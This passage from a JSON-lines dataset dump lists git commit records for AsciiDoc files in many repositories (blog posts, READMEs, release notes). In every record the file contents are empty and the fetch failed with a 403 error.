403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d6c3db0266ffb69d466a2bf0e5edecbb89c60ade","subject":"Adding release notes for release of coverage revapi_java_spi revapi_java","message":"Adding release notes for release of coverage revapi_java_spi revapi_java\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210714-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210714-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"73ae908832ccfa77737bbf8e8792a7f31d57eddf","subject":"Update 2017-06-07-Debugging-Information-Success.adoc","message":"Update 2017-06-07-Debugging-Information-Success.adoc","repos":"apoch\/blog,apoch\/blog,apoch\/blog,apoch\/blog","old_file":"_posts\/2017-06-07-Debugging-Information-Success.adoc","new_file":"_posts\/2017-06-07-Debugging-Information-Success.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apoch\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"26254866a86a5f71384f9dad7012e883a117ea3c","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cc23517bd2b778bc1481f51bc554a10e219e67b8","subject":"y2b create post 10 Awesome Gadgets You Can Buy Right Now!","message":"y2b create post 10 Awesome Gadgets You Can Buy Right Now!","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-06-30-10-Awesome-Gadgets-You-Can-Buy-Right-Now.adoc","new_file":"_posts\/2017-06-30-10-Awesome-Gadgets-You-Can-Buy-Right-Now.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"1f69b16ed5a56f927636cc36a9d83cf56224728b","subject":"--wip-- [skip ci]","message":"--wip-- [skip ci]\n","repos":"moccalotto\/kaos,moccalotto\/kaos","old_file":"_brainstorms\/sr-oneshot.asciidoc","new_file":"_brainstorms\/sr-oneshot.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/moccalotto\/kaos.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"547707586c7326d3fb48b0de7133ea7f31c924e2","subject":"Update 2016-04-05-My-header.adoc","message":"Update 
2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7505cfa4caed283ed1ab399043b41fddc3394ea9","subject":"Update 2016-04-05-My-header.adoc","message":"Update 2016-04-05-My-header.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-05-My-header.adoc","new_file":"_posts\/2016-04-05-My-header.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4f30628742085cf32f5b77c3d6562b8b70b28ecc","subject":"Update 2017-12-31-Seventeen.adoc","message":"Update 2017-12-31-Seventeen.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-12-31-Seventeen.adoc","new_file":"_posts\/2017-12-31-Seventeen.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"93932fd745342452014d3c194c56112fe21d7abf","subject":"Update 2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","message":"Update 2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","repos":"jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog","old_file":"_posts\/2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_file":"_posts\/2008-01-01-OLD-AsciiDoc-Support-in-Jekyll-Blogs-Hosted-on-GitHub-Pages.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"14f32367a52515ab7f0682c257d6dbcf2edf5756","subject":"Renamed '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc' to '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc'","message":"Renamed '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018.adoc' to '_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc'","repos":"mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io,mkhymohamed\/mkhymohamed.github.io","old_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc","new_file":"_posts\/2017-10-15-Egypt-in-the-World-Cup-Russia-2018-with-programming-problem.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkhymohamed\/mkhymohamed.github.io.git\/': The requested URL returned error: 
403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d584e749ac277f9be9ee94b52b654088fc9de36b","subject":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","message":"Update 2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_file":"_posts\/2018-01-14-building-environments-laravel-54-with-angular-4-and-crality.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b770721afc211253daacf260437ed5fd74e12910","subject":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","message":"Update 2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","repos":"anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr,anwfr\/blog.anw.fr","old_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_file":"_posts\/2016-03-19-Fonctionnement-de-Bitcoin-et-de-la-Blockchain.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anwfr\/blog.anw.fr.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4ba10c9de830110ebfd5b073fdb41bb4c43d3a68","subject":"Publish 2013-5-12-Test-Notes.adoc","message":"Publish 2013-5-12-Test-Notes.adoc","repos":"jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io,jrhea\/jrhea.github.io","old_file":"2013-5-12-Test-Notes.adoc","new_file":"2013-5-12-Test-Notes.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jrhea\/jrhea.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64e1ad0b5be0bf03582588f21c01fa3e8112a81f","subject":"Update 2017-09-22-aa.adoc","message":"Update 2017-09-22-aa.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-09-22-aa.adoc","new_file":"_posts\/2017-09-22-aa.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f904181221a52e6b008be977cdee51dd495e9285","subject":"fix the apendix","message":"fix the apendix\n","repos":"dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,dimagol\/trex-core,dimagol\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core,kisel\/trex-core","old_file":"trex_book.asciidoc","new_file":"trex_book.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kisel\/trex-core.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"e2e5e7653cd6e8a4cb1d69a88e571b7f267c644c","subject":"Add mention of WebFlux testing support","message":"Add mention of WebFlux testing 
support\n","repos":"spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework,spring-projects\/spring-framework","old_file":"src\/asciidoc\/web-flux.adoc","new_file":"src\/asciidoc\/web-flux.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/spring-projects\/spring-framework.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a616ad6f51bd73db17e671e7441d7f58ce4d813b","subject":"Update 2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","message":"Update 2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","repos":"fastretailing\/blog,fastretailing\/blog,fastretailing\/blog","old_file":"_posts\/2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","new_file":"_posts\/2015-10-12-Jumpstart-your-career-with-Fast-Retailing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/fastretailing\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7c08b5ddeb99c59f32c0b8b9ad48e1a169bf1c8e","subject":"Update 2017-02-26-University-vs-Practical-Product-Ownership.adoc","message":"Update 2017-02-26-University-vs-Practical-Product-Ownership.adoc","repos":"jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.github.io,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.hubpress.blog,jaredmorgs\/jaredmorgs.github.io","old_file":"_posts\/2017-02-26-University-vs-Practical-Product-Ownership.adoc","new_file":"_posts\/2017-02-26-University-vs-Practical-Product-Ownership.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jaredmorgs\/jaredmorgs.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"09dc1cb249cd955c901401a2f8a8814d01b912ad","subject":"Add initial grubox notes","message":"Add initial grubox notes\n","repos":"jeaye\/jeaye.github.io,jeaye\/jeaye.github.io","old_file":"_drafts\/gruvbox.adoc","new_file":"_drafts\/gruvbox.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jeaye\/jeaye.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2c1015cfebc415fb84a3f3b6ba743832bcb0c443","subject":"y2b create post What Are VR Headphones?","message":"y2b create post What Are VR Headphones?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2016-11-20-What-Are-VR-Headphones.adoc","new_file":"_posts\/2016-11-20-What-Are-VR-Headphones.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"89b3afbc180f67759952dae3b1a2137af177bf43","subject":"create post Apple Is Deliberately Slowing Down Your iPhone","message":"create post Apple Is Deliberately Slowing Down Your 
iPhone","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2018-02-26-Apple-Is-Deliberately-Slowing-Down-Your-iPhone.adoc","new_file":"_posts\/2018-02-26-Apple-Is-Deliberately-Slowing-Down-Your-iPhone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"edc49e3806a191ffc1ac41877d9f6988432872a7","subject":"Update 2016-04-04-Sin-espias.adoc","message":"Update 2016-04-04-Sin-espias.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-04-04-Sin-espias.adoc","new_file":"_posts\/2016-04-04-Sin-espias.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8ff592092fe0096d618058b89839d690b90a7821","subject":"Update 2016-08-02-Yo.adoc","message":"Update 2016-08-02-Yo.adoc","repos":"vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io,vs4vijay\/vs4vijay.github.io","old_file":"_posts\/2016-08-02-Yo.adoc","new_file":"_posts\/2016-08-02-Yo.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/vs4vijay\/vs4vijay.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7daa0687346768ab27ad3608ad311b9f92c27d61","subject":"Update 2016-7-2-Life.adoc","message":"Update 2016-7-2-Life.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"_posts\/2016-7-2-Life.adoc","new_file":"_posts\/2016-7-2-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2811f7dabc413c6a8b6ba972b4fab2e0b20262b8","subject":"Worked on documentation","message":"Worked on documentation\n","repos":"libyal\/esedb-kb,libyal\/esedb-kb","old_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_file":"documentation\/System Resource Usage Monitor (SRUM).asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/libyal\/esedb-kb.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"057b26dbf15c772710bc5971c1ce062f70500f13","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"7b081832eee62d4be83cca4669f20efb2617c559","subject":"Update 
2016-08-19-Hello-everybody.adoc","message":"Update 2016-08-19-Hello-everybody.adoc","repos":"mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io,mkorevec\/mkorevec.github.io","old_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_file":"_posts\/2016-08-19-Hello-everybody.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mkorevec\/mkorevec.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f482942721512ace0832bababd222c25f6e0dc76","subject":"Added AddonManager docs","message":"Added AddonManager docs","repos":"D9110\/core,ivannov\/core,D9110\/core,agoncal\/core,agoncal\/core,forge\/core,pplatek\/core,pplatek\/core,agoncal\/core,oscerd\/core,D9110\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,stalep\/forge-core,D9110\/core,jerr\/jbossforge-core,pplatek\/core,ivannov\/core,agoncal\/core,agoncal\/core,D9110\/core,agoncal\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,pplatek\/core,agoncal\/core,ivannov\/core,oscerd\/core,pplatek\/core,pplatek\/core,pplatek\/core,D9110\/core,ivannov\/core,agoncal\/core,jerr\/jbossforge-core,D9110\/core,forge\/core,oscerd\/core,forge\/core,forge\/core,oscerd\/core,D9110\/core,ivannov\/core,oscerd\/core,pplatek\/core,oscerd\/core,stalep\/forge-core,D9110\/core,pplatek\/core,oscerd\/core,oscerd\/core,D9110\/core,ivannov\/core,jerr\/jbossforge-core,agoncal\/core,pplatek\/core,forge\/core,oscerd\/core,forge\/core,ivannov\/core,forge\/core,jerr\/jbossforge-core,forge\/core,ivannov\/core,ivannov\/core,forge\/core,forge\/core,oscerd\/core,ivannov\/core,jerr\/jbossforge-core,jerr\/jbossforge-core,agoncal\/core","old_file":"addon-manager\/README.asciidoc","new_file":"addon-manager\/README.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/D9110\/core.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"d9faf95274d8cc907ecc9bf2d28ff01c219a3459","subject":"Update 2016-02-26-One.adoc","message":"Update 2016-02-26-One.adoc","repos":"errorval\/blog,errorval\/blog,errorval\/blog","old_file":"_posts\/2016-02-26-One.adoc","new_file":"_posts\/2016-02-26-One.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/errorval\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"fe8f34f63ba57ed4a7908f8d3966943b68afced0","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"33e63ba54faec291addfa6d4c2313c67d6472bed","subject":"Update 2016-11-14-231000-Monday.adoc","message":"Update 2016-11-14-231000-Monday.adoc","repos":"DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io,DullestSaga\/dullestsaga.github.io","old_file":"_posts\/2016-11-14-231000-Monday.adoc","new_file":"_posts\/2016-11-14-231000-Monday.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 
'https:\/\/github.com\/DullestSaga\/dullestsaga.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b52da1eb5fdcf56c02cbf899671e1571dae07b92","subject":"Delete 2017-01-25 Test asciidoc.adoc","message":"Delete 2017-01-25 Test asciidoc.adoc","repos":"adrianwmasters\/adrianwmasters.github.io","old_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_file":"_posts\/2017-01-25 Test asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/adrianwmasters\/adrianwmasters.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"3ee3129e7545c016b1edcb5244c603d2ecae9e10","subject":"Update 2017-04-24-La-patisserie.adoc","message":"Update 2017-04-24-La-patisserie.adoc","repos":"lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie,lrabiet\/patisserie","old_file":"_posts\/2017-04-24-La-patisserie.adoc","new_file":"_posts\/2017-04-24-La-patisserie.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lrabiet\/patisserie.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"8e609dca86ca733178968392b85611f60e74beb6","subject":"Update 2017-07-07-Cloud-Spanner.adoc","message":"Update 2017-07-07-Cloud-Spanner.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_file":"_posts\/2017-07-07-Cloud-Spanner.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4eb432236e78976cce1f41a3b66332d80a428e5f","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-maven-archetype","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-maven-archetype.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"68be0856993c08a28f6682d75605baf616e69e7e","subject":"docs : Create CONTRIBUTING file","message":"docs : Create CONTRIBUTING file\n","repos":"gravitee-io\/gravitee-policy-cors","old_file":"CONTRIBUTING.adoc","new_file":"CONTRIBUTING.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-cors.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"875f8f5eddf48b4fd8a26c1bf0c5a849b71937de","subject":"Update 2019-12-23-Third-Anniversary.adoc","message":"Update 2019-12-23-Third-Anniversary.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_file":"_posts\/2019-12-23-Third-Anniversary.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} 
{"commit":"800856718caca8f16c4a98e4b0b63a0dae4c41d1","subject":"Slight changes to README.adoc","message":"Slight changes to README.adoc\n","repos":"phgrosjean\/R-code","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/phgrosjean\/R-code.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"805e152c0fdb7b78bc84fa1aa6ccfcb2a3a9cc36","subject":"Adding README","message":"Adding README\n","repos":"sim51\/neo4j-talend-component","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/sim51\/neo4j-talend-component.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"acf44a4d7634d17b39405d09d47a89b40097f070","subject":"Update 2016-06-08-Rinna-In-Pepper.adoc","message":"Update 2016-06-08-Rinna-In-Pepper.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_file":"_posts\/2016-06-08-Rinna-In-Pepper.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b4001ae7bf25f7c96aaf09d7667a227dff187534","subject":"Update 2016-10-02-The-1th-content.adoc","message":"Update 2016-10-02-The-1th-content.adoc","repos":"crotel\/meditation,crotel\/meditation,crotel\/meditation,crotel\/meditation","old_file":"_posts\/2016-10-02-The-1th-content.adoc","new_file":"_posts\/2016-10-02-The-1th-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/crotel\/meditation.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"16bd52f6c3218f5a0f325d4d5b699a970e1197ec","subject":"Update 2018-06-24-.adoc","message":"Update 2018-06-24-.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-24-.adoc","new_file":"_posts\/2018-06-24-.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a85ae90719b903701ce41040299985b687b91416","subject":"Update 2015-10-29-My-English-Title.adoc","message":"Update 2015-10-29-My-English-Title.adoc","repos":"gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io,gruenberg\/gruenberg.github.io","old_file":"_posts\/2015-10-29-My-English-Title.adoc","new_file":"_posts\/2015-10-29-My-English-Title.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gruenberg\/gruenberg.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"4c191c66b84fc1bade4f238ecc7ce43558e3bfdc","subject":"Add README file in TorrentLocker directory","message":"Add README file in TorrentLocker 
directory\n","repos":"eset\/malware-research,eset\/malware-research,eset\/malware-research,eset\/malware-research","old_file":"torrentlocker\/README.adoc","new_file":"torrentlocker\/README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/eset\/malware-research.git\/': The requested URL returned error: 403\n","license":"bsd-2-clause","lang":"AsciiDoc"} {"commit":"2cc3455e061bdda589ab4c3f4e1229ad87c9b0a7","subject":"deref","message":"deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2021\/07\/09\/deref.adoc","new_file":"content\/news\/2021\/07\/09\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"dc7c2c414251cbc82674107a8e0a06079cfdf980","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/08\/05\/deref.adoc","new_file":"content\/news\/2022\/08\/05\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c80a6e3ee26825692af4fefcd05725eaf1fe9669","subject":"[docs] Update known issues docs for location awareness","message":"[docs] Update known issues docs for location awareness\n\nRemoves the clauses indicating rack awareness and\nmulti-datacenter are not supported and adds details on\nthe remaining limitations.\n\nChange-Id: I5b083cdf60629aacef3a3ac186a2191f8d7a00d0\nReviewed-on: http:\/\/gerrit.cloudera.org:8080\/12920\nTested-by: Grant Henke <4cf7ebbe638391c4d27a10cf751b99bdbd1a1880@apache.org>\nReviewed-by: Alexey Serbin 